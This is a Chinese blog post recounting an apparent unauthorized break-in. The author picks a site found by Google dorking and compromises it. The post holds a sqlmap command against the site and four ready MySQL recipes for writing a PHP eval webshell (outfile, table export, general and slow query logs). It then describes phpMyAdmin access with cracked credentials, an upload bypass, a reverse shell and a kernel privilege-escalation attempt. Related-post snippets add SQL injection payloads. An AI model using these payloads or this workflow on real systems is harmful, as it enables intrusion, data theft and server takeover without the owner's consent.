崎岖的渗透测试

最新推荐文章于 2023-09-22 09:36:53 发布
最新推荐文章于 2023-09-22 09:36:53 发布
阅读量732 收藏
点赞数
分类专栏: 渗透测试 安全 linux 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hklearner/article/details/125252160
版权
安全 同时被 3 个专栏收录
20 篇文章 2 订阅
订阅专栏
渗透测试
16 篇文章 2 订阅
订阅专栏
linux
3 篇文章 0 订阅
订阅专栏

title: 崎岖的渗透测试实战
tags:

  • 渗透实战
    abbrlink: 47189
    date: 2022-06-12 21:20:58

渗透测试实战

闲来无事,找找站点搞一搞。非常感谢我的大表哥提供的技术帮助和支持。

一波谷歌语法,发现该站点,手工测试,发现可能存在sql注入,抱着试试看的心态,直接丢sqlmap。

因为一直用的windows下的sqlmap2,导致误判dba权限

python2 sqlmap.py -u http://xxxx/PHP/a_content.php?id=61   --random-agent  --tamper=space2hash.py --threads 5 --batch

旧版本sqlmap
在这里插入图片描述

kali下的sqlmap
在这里插入图片描述

mysql写入webshell

顺便学习加复习一下,方便自己以后食用

  1. 通过outfile写入shell

    select '<?php @eval($_POST[1]);?>' into outfile '网站的绝对路径/shell.php';

  2. 将shell写入表中

    将shell插入一个表中
insert into tables values ('<?php @eval($_POST[1]);?>');
查询该数据表,将结果导出文件
select comment from sxss into outfile '网站的绝对路径/shell.php';

  3. 开启全局日志写入shell

    查看全局日志配置
show variables like '%general%';
开启全局配置
set global general_log = on;
将日志文件设置成服务器下的木马文件
set global general_log_file = 'E:/phpStudy2018/PHPTutorial/WWW/shell.php';
然后执行sql语句,mysql会将我没执行的语句记录到日志文件(上一步修改后的文件)中
select '<?php @eval($_POST[1]);?>';

  4. 慢查询日志写入shell(高版本的mysql有默认不让导入导出)

    查看慢查询日志开启情况
show variables like '%slow_query_log%';
开启慢查询日志
set global slow_query_log=1;
修改日志文件存储的绝对路径
set global slow_query_log_file='网站的绝对路径/shell.php';
向日志文件中写入shell
select '<?php @eval($_POST[1]);?>' or sleep(11);

利用条件:

  • root权限

  • 网站的绝对路径且具有写入权限

信息收集

1.扫描一波web路径,发现存在phpadmin

在这里插入图片描述

2.sqlmap一把梭
在这里插入图片描述

3.md5解密
在这里插入图片描述

数据库getshell尝试

  • 登录phpadmin

https://raw.githubusercontent.com/16778738/picture/master/img/202206122202317.png

  • 翻一波之前的phpadmin getshell笔记

确认一下网站的绝对路径

1.into outfile导入木马

select @@basedir;

只有/usr/,试试默认路径/var/www/html,无果

select '<?php eval($_POST[cmd]);?>' into outfile 'web路径';

mysql高版本中secure_file_pirv会对读写进行限制

show global variables like '%secure%';

secure_file_priv为NULL时,表示限制Mysql不允许导入导出。

要想成功,则需要在Mysql文件夹下修改my.ini 文件,在[mysqld]内加入secure_file_priv ="" 即可。
在这里插入图片描述

2.利用Mysql日志文件

mysql5.0以上会创建日志文件

  1. general_log 指的是日志保存状态,ON代表开启 OFF代表关闭;

  2. general_log_file 指的是日志的保存路径。

    查看日志状态:

    show variables like '%general%';

    当开启general时,所执行的sql语句都会出现在log文件

    修改general_log_file的值,执行的sql语句就会对应生成,进而getshell。

    需要注意路径斜杠的方向

    set global general_log = 'on'
set global general_log_file = 'C:/phpStudy/www/hack.php'

    再次执行,getshell

    select '<?php eval($_POST[cmd]);?>'

在这里插入图片描述

无法访问
在这里插入图片描述

前端上传getshell

前端登录,通过sqlmap跑出的用户账号密码登录,发现两处上传,一处头像,一处身份证照片上传
在这里插入图片描述

尝试上传漏洞

burp一把梭
在这里插入图片描述
在这里插入图片描述

经过一波操作尝试,发现图片可以上传成功,但是无法正常访问,和我的大表哥交流得知可能存在路径权限访问限制。

柳暗花明又一村

还得是见多识广的表哥啊!!!!

上传的很多路径都在/PHP/这个路径中,于是做了一下目录递归扫描,发现该站存在路径遍历的问题。

递归一波web路径 ,又学习到了新知识!!!开森
在这里插入图片描述

访问一波/PHP/qa/目录

可以正常访问,意外的有上传
在这里插入图片描述
在这里插入图片描述

webshell

在这里插入图片描述

反弹shell,提权

在这里插入图片描述

CVE-2021-3493(提权内核漏洞)

自己提权失败,linux提权需要学习一波,先借用表哥的图贴上
在这里插入图片描述

webshell的快乐

No One Is Secure Everything Can Be Broken !

脚本实习生
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
崎岖地面上移动机器人构型发展综述
02-14
崎岖地面上移动机器人构型发展综述,徐贺,谭大伟,本文从拓扑结构型式角度对国内外移动机器人进行概括与分类,并从沙地用机器人轮子、车体平衡机构、摇臂机构和转向机构概念设计和
微软的崎岖Mac Office 97道路
03-04
时任微软公司执行官的Ben Waldman,是微软Macintosh业务部门的创建人。根据最近刚刚结案的爱荷华州控告微软违反托拉斯法的共同诉讼(公诉)案的法庭记录,Ben Waldman经过艰苦的努力,留住了Mac Office 97项目。...
遇事不决,一把哈——sqlmap
weixin_58782362的博客
07-28 464
有些网站只能在手机访问,但是sqlmap默认的访问头是电脑头,有些网站就是看文件头的base64编码注入点,需要对参数进行编码,才能进行注入。sqlmap里有自带的过滤规则。在进行post注入的时候,可以在后面加*(其实可以在数据包每行后面都加上一个*),数据包的完整性。
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4642
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
在sqli-liabs学习SQL注入之旅(第一关~第十关)
guanjian_ci的博客
04-20 3933
第一关 第一步:判断参数的类型 ?id=1' 页面报错 ?id=1' --+ 页面正常 判断参数接受类型为 字符型 查看第一关源码:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 证明我们的判断正确! 第二步:猜解字段 ?id=1' order by 3 --+ 页面正常 ?id=1' order by 4 --+ 页面报错 判断字段长度为 3 第三步:爆数据库名 ?id=-
sql注入
qq_47177909的博客
09-29 1763
简介 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息 常识 ## 常用的注入闭合 语句 单引号 1' -- 数字 1 -- 双引号 1" -- 单引号+括号 1') -- 双引号加括号 1") -- 单引号+双括号+双引号 1'
SQL注入Getshell的奇思妙想(下)
Jinmindong
02-13 493
由于笔者发现大量的hr面试官都喜欢从SQL注入开始询问,所以留心了一下关于SQL注入的问题的频率。结果非常amazing啊!不出意外的是–os-shell名列榜首。但是啊由于我们不能被面试官所引导,这样太被动啦!我们应该引导hr问我们擅长的方向,扬长避短;所以我们可以继续和他们讨论除了日志和–os-shell外,还有UDF提权与MOF提权。这个时候就体现了下面这篇文章的重要性!中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像调用本机函数 version() 等方便。补充。
标准复合测试函数(CF)+原文介绍+算例
09-02
这些函数通常分为几个类别,如单峰、多峰、分离、崎岖等,每种类型代表不同的难度级别,以测试算法在不同环境下的适应性。 粒子群优化(PSO)是一种基于群体智能的全局优化算法,灵感来源于鸟群觅食行为。在PSO算例...
崎岖山地环境履带机器人降维变系数控制方法研究.pdf
08-14
#资源达人分享计划#
PSO_TEST.zip_PSO_c++pso实现_pso 测试函数_pso测试
09-20
这些函数具有不同的特性,如单峰、多峰、平坦或崎岖的地形,用于全面评估PSO算法在处理不同问题上的性能。 4. **C++实现** 使用C++实现PSO算法可以充分利用其高效和面向对象的特性。代码可能包含了类定义,如`...
崎岖的白云山之旅作文.doc
01-13
崎岖的白云山之旅作文】是一篇描述户外探险与家庭亲情的范文,它通过一次爬山经历展示了作者与父母的互动以及面对挑战时的成长。文章以阳光明媚的一天为背景,讲述了作者与父母一同攀登白云山的故事,揭示了户外...
学习软件开发千万不要犯的错误
03-23
 最终我是学会了开发自己的原型,但道路很崎岖。如果你也跟我一样走在自学的道路上,我希望你能避免我犯过的错误。  错误#1:我花了大量的时间去学习我实际上并不需要的东西。  我不知道如何开始。有这么多可以...
移动机器人崎岖地面静态目标瞄准跟踪系统
07-30
移动机器人崎岖地面静态目标瞄准跟踪系统 本文提出了一种低成本的彩色视觉系统,用于实时目标跟踪控制方法,该系统 采用了一种嵌入式彩色视觉系统,降低了系统功耗、提高了算法的实时性,并在一个具有4WS4WD和差分机构...
粒子群优化算法(PSO )源代码+23个经典测试函数
04-18
5. **Rastrigin函数**:具有大量局部最小值,全局最小值位于原点,函数图像类似于崎岖的地形。 6. **Weierstrass函数**:一个具有高度复杂性和周期性的函数,挑战算法的连续性和收敛性。 7. **Schwefel函数**:有...
CTFSHOW-sql注入
Yb_140的博客
08-13 2452
web171 最简单的sql注入,先演示基本操作 payload: -1' union select 1,2,database() --+ //得到数据库名为ctfshow_web -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web' --+ //得到数据表名为ctfshow_user -1' union select
SQLMap使用教程:从入门到入狱详细指南
qq_61553520的博客
04-14 5740
本文会主要介绍SQLMap的使用,包括常用的参数,常用的语句,以及常用的功能。
总结分析 | 基于phpmyadmin的渗透测试
最新发布
小司机的奥拓
09-22 2672
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。
mysql配置secure_file_priv
jkzyx123的博客
09-06 8395
secure_file_priv 配置项控制LOAD DATA, SELECT …OUTFILE, LOAD_FILE()的使用权限。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

脚本实习生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值